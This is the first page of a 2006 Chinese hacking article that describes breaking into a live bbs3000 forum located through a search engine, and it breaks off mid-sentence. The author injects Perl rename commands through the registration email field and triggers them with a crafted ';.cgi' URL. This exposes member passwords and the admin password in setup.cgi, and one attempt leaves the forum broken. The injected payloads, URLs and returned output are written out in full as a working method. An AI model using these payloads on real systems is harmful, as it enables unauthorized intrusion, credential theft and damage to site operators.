| 一次入侵bbs3000取得最高权限 |
|
| 作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-29 15:18:44
|
刚看完一篇关于cgi的解析机制的文章,发现了一些漏洞可能可以利用,就拿bbs3000开刀试试。
先上网搜索一个bbs3000的论坛,在google.com键入”bbs/list.cgi“,出来了一大堆,看到一个粘贴美女图的论坛很不爽,就拿你开刀。先注册一用户名为;字符,密码为空格,信箱为
rename "admin.cgi","readme.txt";#@3wcool.com
(这里假设admin为该论坛的社区区长,也就是该论坛最大权限的用户,readme.txt 为自己随便起的一个txt文件),然后我们在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名,下同)
返回的页面显示
'F:\wwwroot\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了,再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
admin admin screen.width-600)this.style.width=screen.width-600;">_blank href=http://x.x.x.x>http://x.x.x.x 2002-04-16
显示的内容前面就是密码、用户
天啊,事情怎么那么容易呀!!~_*
再修改资料把信箱改成rename "readme.txt","admin.cgi";#@3wcool.com
这样就可以用admin登入论坛了,之后你就可以,哈哈,不要扔我。
再跑的
http://x.x.x.x/bbs3000/cjyh.cgi输入用户admin,密码admin,我靠,居然不行,区长设置的管理密码和他的用户密码不一样。那好,我看你的setup.cgi里面的密码是什么。
再把我的油箱改成
rename "../setup.cgi","readme.cgi";#@3wcool.com
然后重复上面步骤在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名,下同)
返回的页面显示
'F:\wwwroot\bbs3000\bbs3000\yhzl\;.cgi' script produced no output 后面的就是关键了,再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
$admname="admin";
$delpsd="admin123";
$imagurl="http://x.x.x.x/bbs/image";
$filepath="D:/wwwroot/cgi-bin/bbs";
$ImgDir="D:/wwwroot/bbs/image";
$ym="http://x.x.x.x/cgi-bin/bbs";
…………
……
则管理员帐号为admin,密码为admin123,返回登入管理界面,靠,现在是什么都不行了,因为论坛缺少了setup.cgi这个文件,所有的cgi都打不开了,拿了密码也没有用了。下线,等斑竹自己修复,我还要去背单词,要考试了。(可能你们要问为什么邮箱不用copy "../setup.cgi","readme.cgi";#@3wcool.com,我试过,没用,可能是权限不够)
到了晚上再来看看论坛已经修好了,我不罢休换个思路再来。
我先发表了一篇文章,随便写点,肯定会被删的东西。然后用论坛上传文件的功能,上传了一个bbs3000原[1] [2] 下一页
|
|
[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入:kinda 责任编辑:kinda |
|
上一篇文章: DoS攻击手法示例
下一篇文章: 瑞士研究人员提出快速破解Windows密码新方法 |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)